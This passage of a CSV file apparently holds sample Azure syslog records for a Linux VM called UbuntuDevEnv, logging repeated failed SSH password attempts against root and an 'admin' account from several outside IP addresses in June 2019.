+7876,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 14:11:23,UbuntuDevEnv,2019-06-11 14:11:22,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=218.92.0.180  user=root,105475,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,,0,
+7877,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 14:11:23,UbuntuDevEnv,2019-06-11 14:11:22,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,105475,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+7878,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 14:11:23,UbuntuDevEnv,2019-06-11 14:11:22,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 218.92.0.180 port 37397: Too many authentication failures [preauth],105475,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,37397,,
+7879,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 14:11:23,UbuntuDevEnv,2019-06-11 14:11:22,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 218.92.0.180 port 37397 ssh2 [preauth],105475,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,37397,,
+7880,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 14:11:28,UbuntuDevEnv,2019-06-11 14:11:27,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=218.92.0.180  user=root,105556,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,,0,
+7881,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 14:11:30,UbuntuDevEnv,2019-06-11 14:11:29,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.180 port 54499 ssh2,105556,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,54499,,
+7882,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 14:11:40,UbuntuDevEnv,2019-06-11 14:11:39,auth,UbuntuDevEnv,info,message repeated 3 times: [ Failed password for root from 218.92.0.180 port 54499 ssh2],105556,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,54499,,
+7883,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 14:11:44,UbuntuDevEnv,2019-06-11 14:11:43,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.180 port 54499 ssh2,105556,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,54499,,
+7884,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 14:11:47,UbuntuDevEnv,2019-06-11 14:11:47,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 218.92.0.180 port 54499: Too many authentication failures [preauth],105556,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,54499,,
+7885,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 14:11:47,UbuntuDevEnv,2019-06-11 14:11:47,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 218.92.0.180 port 54499 ssh2 [preauth],105556,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,54499,,
+7886,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 14:11:47,UbuntuDevEnv,2019-06-11 14:11:47,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.180 port 54499 ssh2,105556,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,54499,,
+7887,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 14:11:47,UbuntuDevEnv,2019-06-11 14:11:47,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,105556,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+7888,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 14:11:47,UbuntuDevEnv,2019-06-11 14:11:47,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=218.92.0.180  user=root,105556,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,,0,
+7889,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 14:11:53,UbuntuDevEnv,2019-06-11 14:11:52,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=218.92.0.180  user=root,105644,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,,0,
+7890,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 14:11:56,UbuntuDevEnv,2019-06-11 14:11:55,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.180 port 10365 ssh2,105644,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,10365,,
+7891,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 14:12:02,UbuntuDevEnv,2019-06-11 14:11:58,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.180 port 10365 ssh2,105644,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,10365,,
+7892,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 14:12:02,UbuntuDevEnv,2019-06-11 14:12:02,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.180 port 10365 ssh2,105644,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,10365,,
+7893,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 14:12:11,UbuntuDevEnv,2019-06-11 14:12:11,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 218.92.0.180 port 10365: Too many authentication failures [preauth],105644,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,10365,,
+7894,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 14:12:11,UbuntuDevEnv,2019-06-11 14:12:11,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=218.92.0.180  user=root,105644,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,,0,
+7895,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 14:12:11,UbuntuDevEnv,2019-06-11 14:12:11,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 218.92.0.180 port 10365 ssh2 [preauth],105644,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,10365,,
+7896,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 14:12:11,UbuntuDevEnv,2019-06-11 14:12:11,auth,UbuntuDevEnv,info,message repeated 3 times: [ Failed password for root from 218.92.0.180 port 10365 ssh2],105644,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,10365,,
+7897,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 14:12:11,UbuntuDevEnv,2019-06-11 14:12:11,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,105644,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+7898,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 14:12:21,UbuntuDevEnv,2019-06-11 14:12:21,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=218.92.0.180  user=root,105732,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,,0,
+7899,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 14:12:23,UbuntuDevEnv,2019-06-11 14:12:23,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.180 port 29801 ssh2,105732,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,29801,,
+7900,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 14:12:38,UbuntuDevEnv,2019-06-11 14:12:38,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=218.92.0.180  user=root,105732,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,,0,
+7901,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 14:12:38,UbuntuDevEnv,2019-06-11 14:12:38,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,105732,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+7902,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 14:12:38,UbuntuDevEnv,2019-06-11 14:12:38,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 218.92.0.180 port 29801 ssh2 [preauth],105732,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,29801,,
+7903,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 14:12:38,UbuntuDevEnv,2019-06-11 14:12:38,auth,UbuntuDevEnv,info,message repeated 5 times: [ Failed password for root from 218.92.0.180 port 29801 ssh2],105732,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,29801,,
+7904,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 14:12:38,UbuntuDevEnv,2019-06-11 14:12:38,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 218.92.0.180 port 29801: Too many authentication failures [preauth],105732,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,29801,,
+7905,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 14:12:45,UbuntuDevEnv,2019-06-11 14:12:44,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=218.92.0.180  user=root,105825,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,,0,
+7906,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 14:12:47,UbuntuDevEnv,2019-06-11 14:12:46,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.180 port 52422 ssh2,105825,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,52422,,
+7907,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 14:13:00,UbuntuDevEnv,2019-06-11 14:12:59,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 218.92.0.180 port 52422: Too many authentication failures [preauth],105825,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,52422,,
+7908,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 14:13:00,UbuntuDevEnv,2019-06-11 14:12:59,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 218.92.0.180 port 52422 ssh2 [preauth],105825,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,52422,,
+7909,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 14:13:00,UbuntuDevEnv,2019-06-11 14:12:59,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=218.92.0.180  user=root,105825,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,,0,
+7910,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 14:13:00,UbuntuDevEnv,2019-06-11 14:12:59,auth,UbuntuDevEnv,info,message repeated 5 times: [ Failed password for root from 218.92.0.180 port 52422 ssh2],105825,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,52422,,
+7911,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 14:13:00,UbuntuDevEnv,2019-06-11 14:12:59,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,105825,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+7912,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 14:13:04,UbuntuDevEnv,2019-06-11 14:13:04,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=218.92.0.180  user=root,105901,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,,0,
+7913,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 14:13:07,UbuntuDevEnv,2019-06-11 14:13:06,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.180 port 5972 ssh2,105901,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,5972,,
+7914,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 14:13:21,UbuntuDevEnv,2019-06-11 14:13:20,authpriv,UbuntuDevEnv,notice,PAM 2 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=218.92.0.180  user=root,105901,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,,0,
+7915,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 14:13:21,UbuntuDevEnv,2019-06-11 14:13:11,auth,UbuntuDevEnv,info,message repeated 2 times: [ Failed password for root from 218.92.0.180 port 5972 ssh2],105901,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,5972,,
+7916,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 14:13:21,UbuntuDevEnv,2019-06-11 14:13:20,auth,UbuntuDevEnv,info,Received disconnect from 218.92.0.180 port 5972:11:  [preauth],105901,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,5972,,
+7917,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 14:13:21,UbuntuDevEnv,2019-06-11 14:13:20,auth,UbuntuDevEnv,info,Disconnected from authenticating user root 218.92.0.180 port 5972 [preauth],105901,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,root,218.92.0.1,5972,,
+7918,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 14:15:27,UbuntuDevEnv,2019-06-11 14:15:27,auth,UbuntuDevEnv,info,Disconnected from 218.92.0.180 port 48599 [preauth],106404,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,48599,,
+7919,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 14:15:27,UbuntuDevEnv,2019-06-11 14:15:27,auth,UbuntuDevEnv,info,Received disconnect from 218.92.0.180 port 48599:11:  [preauth],106404,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,48599,,
+7920,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 15:07:12,UbuntuDevEnv,2019-06-11 15:07:11,auth,UbuntuDevEnv,info,Invalid user admin from 113.172.3.185 port 45261,117936,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,113.172.3.1,45261,,
+7921,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 15:07:12,UbuntuDevEnv,2019-06-11 15:07:11,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,117936,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+7922,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 15:07:12,UbuntuDevEnv,2019-06-11 15:07:11,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=113.172.3.185,117936,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,113.172.3.1,,0,
+7923,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 15:07:14,UbuntuDevEnv,2019-06-11 15:07:14,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 113.172.3.185 port 45261 ssh2,117936,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,113.172.3.1,45261,,
+7924,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 15:07:15,UbuntuDevEnv,2019-06-11 15:07:14,auth,UbuntuDevEnv,info,Connection closed by invalid user admin 113.172.3.185 port 45261 [preauth],117936,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,113.172.3.1,45261,,invalid
+7925,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 15:15:48,UbuntuDevEnv,2019-06-11 15:15:48,auth,UbuntuDevEnv,info,Received disconnect from 222.187.254.189 port 35108:11: Bye Bye [preauth],119847,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,222.187.254.1,35108,,
+7926,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 15:15:48,UbuntuDevEnv,2019-06-11 15:15:48,auth,UbuntuDevEnv,info,Disconnected from 222.187.254.189 port 35108 [preauth],119847,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,222.187.254.1,35108,,
+7927,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 16:01:02,UbuntuDevEnv,2019-06-11 16:01:01,auth,UbuntuDevEnv,info,Invalid user admin from 193.32.163.89 port 49542,129892,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,193.32.163.8,49542,,
+7928,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 16:01:02,UbuntuDevEnv,2019-06-11 16:01:01,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,129892,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+7929,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 16:01:02,UbuntuDevEnv,2019-06-11 16:01:01,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.32.163.89,129892,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.32.163.8,,0,
+7930,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 16:01:04,UbuntuDevEnv,2019-06-11 16:01:03,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 193.32.163.89 port 49542 ssh2,129892,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,193.32.163.8,49542,,
+7931,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 16:01:04,UbuntuDevEnv,2019-06-11 16:01:04,auth,UbuntuDevEnv,info,"Disconnecting invalid user admin 193.32.163.89 port 49542: Change of username or service not allowed: (admin,ssh-connection) -> (user,ssh-connection) [preauth]",129892,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,193.32.163.8,49542,,
+7932,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 16:05:14,UbuntuDevEnv,2019-06-11 16:05:13,auth,UbuntuDevEnv,info,Connection closed by 104.47.157.103 port 58040 [preauth],130780,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,104.47.157.1,58040,,
+7933,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 16:10:52,UbuntuDevEnv,2019-06-11 16:10:51,auth,UbuntuDevEnv,info,Connection closed by 37.204.220.175 port 48880 [preauth],1118,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,37.204.220.1,48880,,
+7934,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 16:20:03,UbuntuDevEnv,2019-06-11 16:20:03,auth,UbuntuDevEnv,info,Connection closed by 104.47.157.103 port 60340 [preauth],3295,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,104.47.157.1,60340,,
